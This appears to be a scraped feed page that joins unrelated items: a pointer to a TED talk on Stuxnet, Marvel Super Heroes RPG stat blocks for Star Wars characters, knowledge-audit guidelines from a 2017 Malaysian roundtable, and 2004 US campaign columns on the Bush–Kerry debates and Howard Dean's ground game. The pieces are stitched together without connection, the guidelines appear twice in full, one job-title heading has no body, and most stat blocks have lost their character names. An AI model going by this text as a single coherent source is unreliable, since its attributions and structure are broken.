Cracking Stuxnet   

Ralph Langner: Cracking Stuxnet, a 21st-century cyber weapon.

Stuxnet è arrivato su TED.


          Star Wars Characters for MSH   

Rescued from Ty States old site.
For Boba Fett and the other Bounty Hunters, see the previous post, here.


Jedi Knight
F- RM (30)
A- RM (30)
S- GD (10)
E- RM (30)
R- EX (20)
I- UN (100)
P- UN (100)
H- 100
K- 220
P- 20
Resist Domination, Acrobatics, Tumbling, Medicine, Occult, Thief, Vehicles, Weaponry- Firearms, Weapons Specialist- Light Saber, Astrogation, Computers, Repair/Tinkering, First Aid, Pilot.

New Republic, Solo's family.

Light Saber- RM (30) material strength
Energy Touch- Heat MN (75)
Reflection MN (75)
Blaster: EX (20) damage; range 5 areas
Mechanical Hand: RM (30) material strength; EX (20) strength


Control UN (100)
Absorb/Dissipate Energy
Accelerate Healing
Combat Trance
Control Disease
Control Pain
Detoxify Poison
Enhance Attributes
Hibernation Trance
Reduce Injury
Remain Conscious
Resist Stun

Sense MN (75)
Blind Sense
Combat Sense
Danger Sense
Hyperspace Tracking
Instinctive Astrogration
Life Detection
Life Sense
Magnify Senses
Receptive Telepathy
Sense Disturbance
Sense Force
Sense Spirit
Time Sense
Truth Sense

Alter AM (50)
Blaster Combat
Lightsaber Combat Projective Telepathy
Accelerate Other's Healing
Force Lights
Inflict Pain
Affect Mind


F- EX (20)
A- EX (20)
S- GD (10)
E- EX (20)
R- GD (10)
I- EX (20)
P- EX (20)
H- 70
K- 50
P- 15

Acrobatics, Computers, Detective, Martial Arts B, E, Military, Thief, Vehicles, Guns, Gambling, Repair/Tinkering, Astrogation, Pilot.

Luke Skywalker, New Republic

Blaster EX (20) damage

SPEED: SH-X (Hyper-Space CL. 5000)
2 Quad Laser Cannons RM (30) Energy
Concussion Missles IN (40) Force
Sensor Dish IN (40)
Escape Pod  


F- GD (10)
A- GD (10)
S- TY (6)
E- EX (20)
R- IN (40)
I- IN (40)
P- AM (50)
H- 46
K- 130
P- 25

Diplomacy, Acrobatics, Engineering, Leadership, Law, Criminology, Guns, Law Enforcement, Detective/Espionage, Marksman, Pilot, Physics, Electronics, Martial Arts A, B, C, D, E, Military, Computers.

Lightsaber- RM (30) Material Strength
Energy Touch- Heat MN(75)
Reflection- MN(75)
Blaster Pistol- EX (20) force


Control- AM (50)

Sense- AM (50)
Danger Sense
Life Sense



F- EX (20)
A- GD (10)
S- RM (30)
E- RM (30)
R- GD (10)
I- RM (30)
P- RM (30)
H- 90
K- 70
P- 10

Hyper-Olfactory EX
Hyper-Hearing PR
Tracking EX
Claws RM (30)
Resist Cold FB (2)
Thermal Vision PR

Computers, Repair/Tinkering, Engineering, Martial Arts B, C, Vehicles, Guns, Astrogation, Gambling, First Aid, Pilot.

Han Solo, New Republic.

Crossbow EX (20) damage


F- EX (20)
A- EX (20)
S- TY (6)
E- GD (10)
R- EX (20)
I- EX (20)
P- GD (10)
H- 56
K- 50
P- 20

Acrobatics, Detective, Medicine, Military, Thief, Guns, Vehicles, Gambling, Mining, Business/Finance, Astrogation, Computers, Repair/Tinkering, Pilot.

Han Solo, Luke Skywalker, New Republic, Mining Industry.

Blaster EX (20) damage


F- FB (2)
A- FB (2)
S- PR (4)
E- EX (20)
R- EX (20)
I- TY (6)
P- TY (6)
H- 28
K- 32
R- N/A
P- 0

Claws GD (10)
Resist Cold GD (10)
Comprehend Languages TY (6)
Energy Sponge TY (6)
Heat Vision GD (10)
Circular Vision
Life Detection RM (30)
Radarsense IN (40)
Radio Communication MN (75)
Total Memory UN (100)
Body Resistance PR (4)
Communicate with Cybernetics MN (75)

Computers, Detective, Thief, Vehicles, Languages, First Aid, Pilot.

C3PO, Luke Skywalker

Grappling Hook & Line- 3 area range
Fire Extinguisher


F- FB (2)
A- PR (4)
S- TY (6)
E- EX (20)
R- EX (20)
I- TY (6)
P- TY (6)
H- 32
K- 32
R- N/A
P- 0

Resist Cold GD (10)
Comprehend Languages UN (100)
Hyper-Hearing GD (10)
Microscopic Vision GD (10)
Total Memory UN (100)
Communicate with Cybernetics UN (100)
Telescopic Vision PR

Computers, Languages, First Aid.

R2D2, Luke Skywalker, Ewoks


F- FB (2)
A- FB (2)
S- FB (2)
E- PR (4)
R- IN (40)
I- UN (100)
P- UN (100)
H- 10
K- 240
P- 50

Alien Species, Bureaucracy, Cultures, Languages, Planetary Systems, Astrogation, Bargain, Leadership, Gambling, Persuasion, First Aid, Jedi Lore.
Jedi Knights.

Control SH-Y
Absorb/Dissipate Energy
Accelerate Healing
Control Pain
Detoxify Poison
Enhance Attributes
Hibernation Trance
Reduce Injury
Remain Conscious
Resist Stun
Short-term Memory Enhancement

Sense SH-X
Combat Sense
Danger Sense
Instinctive Astrogration
Life Detection
Life Sense
Magnify Senses
Receptive Telepathy
Sense Disturbance
Sense Force
Sense Path

Alter UN
Lightsaber Combat Projective Telepathy
Accelerate Other's Healing
Control Another's Pain
Return Another to Consciousness
Transfer Force
Dim Other's Senses
Affect Mind
Control Mind
Force Harmony


Annakin Skywalker
F- IN (40)
A- RM (30)
S- RM (30)
E- IN (40)
R- EX (20)
I- UN (100)
P- UN (100)
H- 130
K- 220
P- (-75)

Leadership, Occult (the Force), Military, Space Pilot, Martial Arts D.


Light Saber Rem material strength
Energy Blade Psyche (UN-100) rank damage
Reflection Psyche (UN-100) energy reflection


Control SH-X (150)
Absorb/Dissipate Energy
Accelerate Healing
Control Pain
Detoxify Poison
Enhance Attributes
Hibernation Trance
Reduce Injury
Remain Conscious
Resist Stun

Sense UN (100)
Combat Sense
Danger Sense
Instinctive Astrogration
Life Detection
Life Sense
Magnify Senses
Receptive Telepathy
Sense Force

Alter MN (75)
Lightsaber Combat Projective Telepathy
Feed on Dark Side
Inflict Pain
Affect Mind
Telekinetic Kill


F- TY (6)
A- TY (6)
S- PR (4)
E- TY (6)
R- IN (40)
I- UN (100)
P- UN (100)
H- 22
K- 240
P- (-50)

Alien Species, Bureaucracy, Cultures, Intimidation, Law Enforcement, Military History, Planetary Systems, Archaic Library Systems, Arcane Technologies, Clone Vat Systems, Dark Side Lore, Jedi Lore, Lightsaber Histories, Fleet Tactics, Ground Assault Tactics, Leadership, Bargain, Detective/Espionage, Lightsaber Repair.



Control SH-Y
Absorb/Dissipate Energy
Accelerate Healing
Control Pain
Detoxify Poison
Enhance Attributes
Hibernation Trance
Reduce Injury
Remain Conscious
Resist Stun
Short-term Memory Enhancement

Sense SH-X
Combat Sense
Danger Sense
Instinctive Astrogration
Life Detection
Life Sense
Magnify Senses
Receptive Telepathy
Sense Force

Alter UN
Lightsaber Combat Projective Telepathy
Accelerate Other's Healing
Control Another's Pain
Feed on Dark Side
Force Lightning
Inflict Pain
Return Another to Consciousness
Transfer Force
Affect Mind
Control Mind
Drain Life Essence
Enhanced Coordination
Telekinetic Kill
Transfer Life
Dim Other's Senses


F- TY (6)
A- TY (6)
S- TY (6)
E- GD (10)
R- IN (40)
I- RM (30)
P- IN (40)
H- 28
K- 110
P- 0

Artist, Detective, Martial Arts E, Military, Vehicles, Guns, Leadership.



F- EX (20)
A- GD (10)
S- TY (6)
E- GD (10)
R- RM (30)
I- IN (40)
P- IN (40)
H- 446
K- 110
P- 0

Guns, Martial Arts E, Acrobatics, Law, Law Enforcement, Pilot, Military, Criminology, Computers, Electronics, Leadership.

Blaster Pistol- EX (20) Force



H- 70
K- 36 Equipment: Blaster Rifle EX Energy damage or intensity stun
Armor GD vs. Physical; TY vs. Energy 


F- GD (10)
A- PR (4)
S- PR (4)
E- EX (20)
R- EX (20)
I- RM (30)
P- RM (30)
H- 38
K- 80
P- (-30)

Special Abilities:
Force Resistance
Hutts have an innate defense against Force based mind-manipulation techniques. They receive a +2CS to resist.

Resist Domination, Bereaucracy, Business/Finance, Cultures, Intimidation, Languages, Law Enforcement, Streetwise, Bargaining, Leadership, Gambling, Persuasion.

Galactic Underworld, Empire.

cannot move without assistance
          How-to Guides>> Cross-Post: Practitioner Guidelines on Conducting Knowledge Audits   
These guidelines were compiled by the participants in the Kuala Lumpur Knowledge Management Roundtable, May 3 2017, hosted by Securities Commission Malaysia. 1. BEFORE THE KNOWLEDGE AUDIT a)Framing: Examine the organisation’s structure, and the distinct functions of each department. Get hold of the department business process workflows. Have preliminary conversations with management to sound them out informally on the idea, identify the pain points and business issues they are concerned about. Make informal observations of the current culture, business processes, and knowledge types being used in the business. Make sure you understand the culture of the organisation, the business environment and ecosystem, as well as current organisational change initiatives under way. Consider the best model of audit, and audit methods to use for that culture and situation. Identify key potential influencers, supporters, partners, naysayers. Speak with potential allies first (e.g. HODs of friendly departments) and socialize them on the knowledge audit concept, seeking their feedback on how it could be made most useful to them. Be clear on the objective of the audit, i.e. what we want to achieve, the potential ROI of the audit, the main issues to address, how it connects to and supports business objectives, who are our stakeholders, who are our sponsors, who are our target audiences and respondents. Consider what label you are going to use for the knowledge audit, appropriate to the organisational culture – (e.g. KM assessment, KM evaluation, knowledge audit, KM audit, knowledge mapping, KM needs analysis, KM planning exercise, etc.). Make sure you have sufficient resources to conduct the audit, scale the audit to your resources. If it is a discovery audit, be sure you have sufficient resources to pursue additional lines of enquiry if new issues come up during the audit. Determine the audit type, and the appropriate audit methods considering your objectives, your capabilities and resources and your organisation culture. Get formal support and buy-in for the audit scoping from senior management – be clear about the level of resources, participation and time required, from them, and from their people. Be clear about the need and benefits of a knowledge audit, the intended goals, desired outcomes, and guiding principles, and be clear about the importance of their role in implementing the recommendations when the audit is complete. Connect the audit to your understanding of the business strategy to show how KM assists the business strategy. Share examples of how similar organisations have used knowledge audits to produce business benefits. Ask them for a clear mandate and for their assistance in nominating the right participants in the audit. If it is a discovery audit, let them know that the activities may change based on issues discovered as the audit progresses. b)Planning: Define what outcomes you want from each step in the knowledge audit process, and identify risks to the outcomes, and mitigation strategies for those risks. Identify constraints that could impact the project plan – e.g. other organisational initiatives, annual cycles of events, holiday periods etc. If you are using an external consultant, identify potential candidates, and scope their work and role in the project. Define the requirements and deliverables. Make sure you have the resources and budget required. Identify the roles and resources required from your own team, and ensure they have the time and capacity to perform their roles. Identify the right respondents for your knowledge audit (based on audit type, and audit goals) – e.g. subject matter experts, department representatives, representatives of different types of staff (functions, levels, years of service). Come up with a detailed project plan and timeline, with major deliverables, completion criteria, all the way from initial communications and preparation to the implementation of audit recommendations. c)Preparing: Identify the major focus areas to explore for surveys, interviews, focus groups. Design the data collection instruments and the workshops, as relevant. Invite the right level of staff – preferably 2-5 years of experience doing the job. Make sure their managers are informed of the invitations, or that the invitations are routed via their managers. If you can, get the main (senior) project sponsor to send out the invitations. Develop a communications package for all the knowledge audit respondents on their required involvement, any preparation, assurances of confidentiality (if relevant), what will be done with their inputs, etc. Communicate to all stakeholders and participants what the audit’s purpose is, what their involvement will be, and what the desired outcomes are. Provide briefing documents for each stakeholder/participant type and each major activity they are involved in – e.g. senior leadership, heads of department, subject matter experts, etc. Run briefing and awareness sessions for stakeholders and participants, on the plan. Prepare the logistics, materials and tools for the audit data collection activities. Consider the venues, and method of collecting data – e.g. recording, transcription, mapping tools, post-its and flip charts. For workshops think about well-lighted rooms, with plenty of wall-space, refreshments, and away from work emails and distractions. For interviews, think about the value of having interviews at the workplace where work artefacts can be pointed out or observed. Learn as much as you can about the participants’ job roles, major functions and work processes in advance of the audit commencement. 2. DURING THE KNOWLEDGE AUDIT Be open to using a variety of methods for collective sensemaking and data gathering: e.g. World Café, anecdote circles. Make sure the people who turn up are properly qualified to give you the data you need – if less experienced or more junior people turn up, go back to their bosses and your original mandate to ask for the right people. Be prepared to keep communicating the purpose, activities and desired outcomes, and to remind participants at every stage in the activity. They will not remember the big picture from one point in the project to the next. Provide handholding and coaching where required on things like mapping activities. For workshops, think of having a main facilitator to drive the whole workshop, and co-facilitators to coach and guide individuals or groups within the workshop activities. Have an experienced facilitator who knows how to deal with cases where participants give push-back and do not want to cooperate. Consider whether you might need an external facilitator/ consultant. Anticipate potential push-back (your initial sensing in the Framing phase will help) and prepare your responses. Document the issues raised by participants during the exercise. Maintain and open mind, and document issues they raise even if you disagree with them or think them unimportant. Use, video, audio, photos, note-taking, maps, mind-maps, transcriptions, etc. Be prepared to go back to them for clarifications on any feedback that is unclear. If creating knowledge asset maps, make sure the business activity and knowledge asset descriptions are documented clearly and as completely as possible. Make sure you validate their contributions back with them once it has been documented. Anticipate potential confusions or errors – e.g. assuming that business activities in a knowledge map are the same as process flows. Try to provide for something of value in the audit activities that they can take back with them and use immediately – e.g. facilitating them towards an awareness of things they can address immediately before waiting for the audit close. This creates buy-in and will support the change management effort later when the post-audit implementation plan is ready. Try to include some elements of fun in workshop activities, as well as food and a pleasant environment. Be clear about what will be documented, how confidentiality will be handled, and make sure you maintain their trust by demonstrating your knowledge of their roles and work areas, and by sticking to the guiding principles and assurances given at the start. Be prepared to deal with sensitivities and doubts about how their input will be used, and what it is for, e.g. if participants do not like to acknowledge risks or gaps, explain the purpose, and adjust the terminology as necessary. Maintain a balance between being knowledgeable about their work (to identify pain points, focus areas and prepare probing questions, and to establish trust and common ground) and being naïve about their work so that you can ask naïve questions. Naïve questions often provide rich insights. Provide regular updates on the progress of the exercise. Be prepared to adjust your audit plan, to add or change audit activities and/or audit methods, to investigate new issues, based on the findings and observations during the audit. 3. AFTER THE KNOWLEDGE AUDIT Analyse the data and prepare the audit report with observations and recommendations. Summarise the key messages and validate if necessary with key respondents. Substantiate findings with verbatim examples and participant inputs in their own words, anonymised if necessary. In your report, focus on the original audit objectives. However, make sure you document and maintain any findings or data discovered in the audit that may be of relevance in the future. Be prepared to produce supplementary reports in the future based on this data to address specific issues that may arise. Review the report with your own internal team first to make sure their insights into the audit process and findings are considered. Be clear about what you want to use the report to achieve. Determine the most important actions to be taken as a result of the audit, focusing on the most important risks, gaps and opportunities, seek senior management endorsement, and develop a detailed implementation plan, with a means of tracking and measuring progress and impact against the plan. Define tangible benefits that you can identify as positive outcomes from the audit. If possible, embed the action plan into the organisation’s annual strategic plan and workplans. Determine the best ways to present and communicate the knowledge audit findings promptly (a) to the participants (b) to the sponsor and stakeholders© to the people responsible for follow up actions and (d) to the organisation at large. Prepare a communications package for each audience and purpose. Consider a range of formats to communicate key points: written report, presentation slides, infographics, video summaries, promotional collateral such as calendars, mousepads, etc. If you have created knowledge maps, make sure you revisit them, refresh them and repurpose them continuously e.g. to track risks, opportunities and gaps addressed, identify and track new activities, as input to taxonomy, as inputs to departments on department level KM activities, etc. Don’t be afraid to keep going back to your data and redeploying it for new purposes. Let people see that it can be a constant reference tool. Do change management. Be prepared to provide continuous support and networking on the follow up activities. Provide tools and automation as necessary, with reasonable maintenance and support costs. For the inputs in this post, our thanks to participants from: •CyberSecurity Malaysia •INCEIF •JKR •MTDC •PETRONAS •Securities Commission Malaysia •Straits Knowledge and Ghazali Mohamed Fadzil. Do please feel free to comment if you would like to add or modify any guidelines.
          Blog>> Practitioner Guidelines for Knowledge Audits   
These guidelines were compiled by the participants in the Kuala Lumpur Knowledge Management Roundtable, May 3 2017, hosted by Securities Commission Malaysia. 1. BEFORE THE KNOWLEDGE AUDIT a)Framing: Examine the organisation’s structure, and the distinct functions of each department. Get hold of the department business process workflows. Have preliminary conversations with management to sound them out informally on the idea, identify the pain points and business issues they are concerned about. Make informal observations of the current culture, business processes, and knowledge types being used in the business. Make sure you understand the culture of the organisation, the business environment and ecosystem, as well as current organisational change initiatives under way. Consider the best model of audit, and audit methods to use for that culture and situation. Identify key potential influencers, supporters, partners, naysayers. Speak with potential allies first (e.g. HODs of friendly departments) and socialize them on the knowledge audit concept, seeking their feedback on how it could be made most useful to them. Be clear on the objective of the audit, i.e. what we want to achieve, the potential ROI of the audit, the main issues to address, how it connects to and supports business objectives, who are our stakeholders, who are our sponsors, who are our target audiences and respondents. Consider what label you are going to use for the knowledge audit, appropriate to the organisational culture – (e.g. KM assessment, KM evaluation, knowledge audit, KM audit, knowledge mapping, KM needs analysis, KM planning exercise, etc.). Make sure you have sufficient resources to conduct the audit, scale the audit to your resources. If it is a discovery audit, be sure you have sufficient resources to pursue additional lines of enquiry if new issues come up during the audit. Determine the audit type, and the appropriate audit methods considering your objectives, your capabilities and resources and your organisation culture. Get formal support and buy-in for the audit scoping from senior management – be clear about the level of resources, participation and time required, from them, and from their people. Be clear about the need and benefits of a knowledge audit, the intended goals, desired outcomes, and guiding principles, and be clear about the importance of their role in implementing the recommendations when the audit is complete. Connect the audit to your understanding of the business strategy to show how KM assists the business strategy. Share examples of how similar organisations have used knowledge audits to produce business benefits. Ask them for a clear mandate and for their assistance in nominating the right participants in the audit. If it is a discovery audit, let them know that the activities may change based on issues discovered as the audit progresses. b)Planning: Define what outcomes you want from each step in the knowledge audit process, and identify risks to the outcomes, and mitigation strategies for those risks. Identify constraints that could impact the project plan – e.g. other organisational initiatives, annual cycles of events, holiday periods etc. If you are using an external consultant, identify potential candidates, and scope their work and role in the project. Define the requirements and deliverables. Make sure you have the resources and budget required. Identify the roles and resources required from your own team, and ensure they have the time and capacity to perform their roles. Identify the right respondents for your knowledge audit (based on audit type, and audit goals) – e.g. subject matter experts, department representatives, representatives of different types of staff (functions, levels, years of service). Come up with a detailed project plan and timeline, with major deliverables, completion criteria, all the way from initial communications and preparation to the implementation of audit recommendations. c)Preparing: Identify the major focus areas to explore for surveys, interviews, focus groups. Design the data collection instruments and the workshops, as relevant. Invite the right level of staff – preferably 2-5 years of experience doing the job. Make sure their managers are informed of the invitations, or that the invitations are routed via their managers. If you can, get the main (senior) project sponsor to send out the invitations. Develop a communications package for all the knowledge audit respondents on their required involvement, any preparation, assurances of confidentiality (if relevant), what will be done with their inputs, etc. Communicate to all stakeholders and participants what the audit’s purpose is, what their involvement will be, and what the desired outcomes are. Provide briefing documents for each stakeholder/participant type and each major activity they are involved in – e.g. senior leadership, heads of department, subject matter experts, etc. Run briefing and awareness sessions for stakeholders and participants, on the plan. Prepare the logistics, materials and tools for the audit data collection activities. Consider the venues, and method of collecting data – e.g. recording, transcription, mapping tools, post-its and flip charts. For workshops think about well-lighted rooms, with plenty of wall-space, refreshments, and away from work emails and distractions. For interviews, think about the value of having interviews at the workplace where work artefacts can be pointed out or observed. Learn as much as you can about the participants’ job roles, major functions and work processes in advance of the audit commencement. 2. DURING THE KNOWLEDGE AUDIT Be open to using a variety of methods for collective sensemaking and data gathering: e.g. World Café, anecdote circles. Make sure the people who turn up are properly qualified to give you the data you need – if less experienced or more junior people turn up, go back to their bosses and your original mandate to ask for the right people. Be prepared to keep communicating the purpose, activities and desired outcomes, and to remind participants at every stage in the activity. They will not remember the big picture from one point in the project to the next. Provide handholding and coaching where required on things like mapping activities. For workshops, think of having a main facilitator to drive the whole workshop, and co-facilitators to coach and guide individuals or groups within the workshop activities. Have an experienced facilitator who knows how to deal with cases where participants give push-back and do not want to cooperate. Consider whether you might need an external facilitator/ consultant. Anticipate potential push-back (your initial sensing in the Framing phase will help) and prepare your responses. Document the issues raised by participants during the exercise. Maintain and open mind, and document issues they raise even if you disagree with them or think them unimportant. Use, video, audio, photos, note-taking, maps, mind-maps, transcriptions, etc. Be prepared to go back to them for clarifications on any feedback that is unclear. If creating knowledge asset maps, make sure the business activity and knowledge asset descriptions are documented clearly and as completely as possible. Make sure you validate their contributions back with them once it has been documented. Anticipate potential confusions or errors – e.g. assuming that business activities in a knowledge map are the same as process flows. Try to provide for something of value in the audit activities that they can take back with them and use immediately – e.g. facilitating them towards an awareness of things they can address immediately before waiting for the audit close. This creates buy-in and will support the change management effort later when the post-audit implementation plan is ready. Try to include some elements of fun in workshop activities, as well as food and a pleasant environment. Be clear about what will be documented, how confidentiality will be handled, and make sure you maintain their trust by demonstrating your knowledge of their roles and work areas, and by sticking to the guiding principles and assurances given at the start. Be prepared to deal with sensitivities and doubts about how their input will be used, and what it is for, e.g. if participants do not like to acknowledge risks or gaps, explain the purpose, and adjust the terminology as necessary. Maintain a balance between being knowledgeable about their work (to identify pain points, focus areas and prepare probing questions, and to establish trust and common ground) and being naïve about their work so that you can ask naïve questions. Naïve questions often provide rich insights. Provide regular updates on the progress of the exercise. Be prepared to adjust your audit plan, to add or change audit activities and/or audit methods, to investigate new issues, based on the findings and observations during the audit. 3. AFTER THE KNOWLEDGE AUDIT Analyse the data and prepare the audit report with observations and recommendations. Summarise the key messages and validate if necessary with key respondents. Substantiate findings with verbatim examples and participant inputs in their own words, anonymised if necessary. In your report, focus on the original audit objectives. However, make sure you document and maintain any findings or data discovered in the audit that may be of relevance in the future. Be prepared to produce supplementary reports in the future based on this data to address specific issues that may arise. Review the report with your own internal team first to make sure their insights into the audit process and findings are considered. Be clear about what you want to use the report to achieve. Determine the most important actions to be taken as a result of the audit, focusing on the most important risks, gaps and opportunities, seek senior management endorsement, and develop a detailed implementation plan, with a means of tracking and measuring progress and impact against the plan. Define tangible benefits that you can identify as positive outcomes from the audit. If possible, embed the action plan into the organisation’s annual strategic plan and workplans. Determine the best ways to present and communicate the knowledge audit findings promptly (a) to the participants (b) to the sponsor and stakeholders© to the people responsible for follow up actions and (d) to the organisation at large. Prepare a communications package for each audience and purpose. Consider a range of formats to communicate key points: written report, presentation slides, infographics, video summaries, promotional collateral such as calendars, mousepads, etc. If you have created knowledge maps, make sure you revisit them, refresh them and repurpose them continuously e.g. to track risks, opportunities and gaps addressed, identify and track new activities, as input to taxonomy, as inputs to departments on department level KM activities, etc. Don’t be afraid to keep going back to your data and redeploying it for new purposes. Let people see that it can be a constant reference tool. Do change management. Be prepared to provide continuous support and networking on the follow up activities. Provide tools and automation as necessary, with reasonable maintenance and support costs. For the inputs in this post, our thanks to participants from: •CyberSecurity Malaysia •INCEIF •JKR •MTDC •PETRONAS •Securities Commission Malaysia •Straits Knowledge and Ghazali Mohamed Fadzil. Do please feel free to comment if you would like to add or modify any guidelines.
          Unanswered Questions   

SCOTTSDALE, ARIZ.—There are lots of questions going into the third and final presidential debate of the 2004 campaign: Will President Bush find his inside voice? After two debate victories, will the overconfident, coasting "Bad Kerry" return? Will Bush wire himself with an earpiece so he can listen to the baseball playoffs? What bad Red Sox joke will Kerry make? Most important, wouldn't the nation be better off if this were another foreign-policy debate?

If you've paid any attention at all to the presidential campaign for the past seven months, you know the basic differences between Bush and Kerry on taxes, health care, education, abortion, same-sex marriage, Social Security, outsourcing, or whatever your favorite domestic issue is. There are no unanswered questions for the two men that I can think of. Instead, Wednesday night's debate will be a shallow exercise in political point-scoring, with each candidate trying to highlight the embarrassing parts of his opponent's record.

Normally, I'd think such an event would be both great fun and worthwhile. But on foreign policy, the central issue of this election, there's still a great deal of confusion as to where each candidate stands, despite a presidential debate and a half, and a vice presidential debate, on the subject. Do you know, for example, what John Kerry's position is on how the nation should deal with state sponsors of terrorism? Does he agree with Bush that those who harbor terrorists are as guilty as the terrorists themselves? What's his opinion of the Bush Doctrine? Would he amend it? If so, how? Does he think the nation should adhere to a foreign-policy doctrine, or should we just take an ad hoc approach to terrorism and other global problems?

None of those questions were addressed in the first three debates. The campaign's focus on unilateralism vs. internationalism has obscured the more fundamental foreign-policy difference between Bush and Kerry: their views on the role of states, and state sponsors, in the war on terror. Matt Bai's New York Times Magazine piece on John Kerry's view of the war on terror elucidates this difference between the two men more clearly than any article yet written on Kerry's foreign policy, including manful attempts by the Atlantic and TheNew Yorker.

Bush's war on terror assumes that states are the main actors in international affairs. After 9/11, Bush expressed skepticism that a mere "network" could have pulled off such a feat. Bush, Bai writes, does not believe that terrorists "can ultimately survive and operate independently of states." The Bush National Security Strategy calls terrorists "clients" of rogue states. The Bush war on terror is remarkably state-centric. After the fall of Afghanistan, the administration immediately began looking for the next state to topple.

Kerry focuses on nonstate actors, international networks that operate outside of state control. "Kerry's view, on the other hand, suggests that it is the very premise of civilized states ... that is under attack," Bai writes. Kerry's internationalism stems from his view of the war on terror, rather than vice versa: "And no one state, acting alone, can possibly have much impact on the threat, because terrorists will always be able to move around, shelter their money and connect in cyberspace; there are no capitals for a superpower like the United States to bomb, no ambassadors to recall, no economies to sanction."

The clear implication of Bai's article is not, as the Bush campaign would have it, that Kerry wants only to reduce terrorism to a "nuisance" while Bush wants to eliminate it. It's that Bush would seek to topple more regimes in his second term, while Kerry wouldn't. Perhaps everyone already knew that. But don't you want to know more about it? I've already proposed several questions for Kerry. Here are some for Bush: Mr. President, you say John Kerry has a "fundamental misunderstanding" of the war on terror when he says it is only a war against al-Qaida. Does this mean that you are likely to try to change other regimes by force in the Middle East in your second term—those that harbor, say, Hezbollah, Hamas, Islamic Jihad? You say those who harbor terrorists are as guilty as the terrorists themselves. What countries in the world are harboring terrorists, and how do you plan to punish them for their guilt? When you mock Sen. Kerry for saying the war on terror is in large part a "law enforcement operation," are you saying that breaking up terrorist cells is insufficient for victory in the war? What is sufficient for victory? Other than Iraq and Afghanistan, where do you see the next battleground in the war on terror?

If you want to know about the candidates' health-care plans, you can read about them on their Web sites and in newspaper articles. We're a nation at war. Don't you wish the two candidates had to answer some more questions about who exactly we're at war with?

          Cyber Security Engineer   

          Organization Man   

DES MOINES, IOWA—Tim Connolly should be scared, maybe even terrified, that Howard Dean is going to lose and lose big. Not because of the much-touted polls that show Dean sinking to a four-way tie in Iowa with the caucuses less than 48 hours away, but because Connolly, the Dean campaign's Iowa state field director, has seen the campaign's internal numbers. And using traditional Iowa math, the numbers don't look good.

"We did an analysis of our 'ones' "—the voters the campaign has determined are committed to caucusing for Dean (a "two" is a leaner, and a "three" is undecided), Connolly says. "Sixty-five percent of them have never caucused before, which is an extremely high number and would scare the shit out of most campaigns," because they'd be worried that the voters wouldn't show up Monday night. But Connolly's not scared. "Common sense would say I should be, but I'm not," he says. "We have the organizational strength to meet that challenge."

Organization. It's the mantra of every pundit on television and every campaign on the ground two days before the caucuses. At most of the candidate events I've attended since arriving in Iowa Thursday, I had the feeling I was watching a sideshow from the real campaign that was taking place somewhere else: on the streets and in people's homes. The story of the final days of Dean's Iowa campaign isn't his bus trip or his stump speeches. It's his 3,500 out-of-state volunteers who've come from all over the country—and farther, including three expatriates from Tokyo—to canvass the state. Over the course of the campaign's final three days, they're knocking on more than 200,000 doors. If Dean wins Monday, Connolly and the campaign will have proved that the Internet's effect on politics isn't just about fund-raising or Meetup or blogging. The Internet can win the ground war.

"We did an analysis of every precinct that is walkable, which is not a precise science," Connolly says. Those walkable precincts make up only about a third of the state's 1,993 precincts, but they include probably 85 percent to 90 percent of the delegate total. The Dean campaign mapped each one using computer software, and it determined the address of every registered Democrat and independent voter in the precincts. Suitably armed with the map, the addresses, and the right amount of Dean paraphernalia, the volunteers are swarming the state. Even if they don't convert a single voter, they return with important information—who's supporting Kerry or Edwards or Gephardt, who's undecided but going to the caucuses, who likes Dean but needs a babysitter to be able to caucus—that the campaign can use to fine-tune its strategy up to the final hours.

What does this have to do with the Internet? The vast majority of the volunteers who make up this weekend's "Perfect Storm" for Dean signed up online, transmitting their names, their housing needs, their flight information, and more. "We could not do the Storm without the Internet," Connolly says. Nor could the campaign have been prepared well enough to have specific jobs ready for each volunteer as he or she arrived. "It's still just the Stormers knocking on a door. But the back end—they would not be here and effectively employed and utilized were it not for the Internet."

The Net is the tool that's enabled the Dean campaign to capitalize on the grass-roots energy created by its candidate. In the past, an insurgent candidate like Dean would generate excitement, but he wouldn't be able to turn it into an organization. "This happened with Gary Hart," says Connolly, who worked for Hart's '84 campaign. "You got excited about the guy named Gary Hart, you liked what he was saying, but there was no local office to call, you couldn't go to a Meetup, etc."

The Internet excels at just keeping people involved with the campaign. "A volunteer who has nothing to do will become discouraged and no longer volunteer," Connolly says. "You used to do things. You'd have cases of envelopes, and you'd have people address them. And when they're done, you'd throw them away." Or you'd have volunteers enter unnecessary data into computers. Just to keep people involved and interested in the campaign and the candidate. The Dean blog serves the same function, while also serving as a communications medium and a fund-raising tool. The role of the Internet and the blog in the campaign's ground organization is what Dean's skeptics haven't understood, Connolly says. "They think that the Dean campaign is simply a cybercampaign. They don't realize that each of those people also lives in the analog world."

Just a couple of hours after I finished talking with Connolly, the Dean campaign was hit with its latest piece of bad news: the latest Des Moines Register poll, which shows Kerry in the lead with 26 percent, followed by Edwards at 23 percent, Dean at 20 percent, Gephardt at 18 percent, and a 4 percent margin of error. Connolly told me he doesn't "lose any sleep over the Zogby poll or any other poll," because he knows their strength on the ground.

Of course, every campaign hails its organizational strength. Gephardt spokesman Bill Burton told the Des Moines Register of his candidate's campaign, "This has been an organizational force in the state that has never been seen before by anybody, Democrats or Republicans." I asked Connolly what he'd be banking on if he were Gephardt's field director. Organized labor, the fact that he's won Iowa before, "and just the general denial that goes on in campaigns," he said. Monday night, we'll see who's in denial.

          "We'll See If It Happens"   

NASHUA, N.H.—The metaphor of choice for Howard Dean's Internet-fueled campaign is "open-source politics": a two-way campaign in which the supporters openly collaborate with the campaign to improve it, and in which the contributions of the "group mind" prove smarter than that of any lone individual.

Dean campaign manager Joe Trippi has admitted on numerous occasions (including this Slashdot post) that his time in Silicon Valley affected his thinking about politics. "I used to work for a little while for Progeny Linux Systems," Trippi told cyber-guru Lawrence Lessig in an August interview. "I always wondered how could you take that same collaboration that occurs in Linux and open source and apply it here. What would happen if there were a way to do that and engage everybody in a presidential campaign?"

But tonight, at the end of a town hall meeting at Daniel Webster College, is the first time I've seen the metaphor in action. Even if it had nothing to do with the Internet.

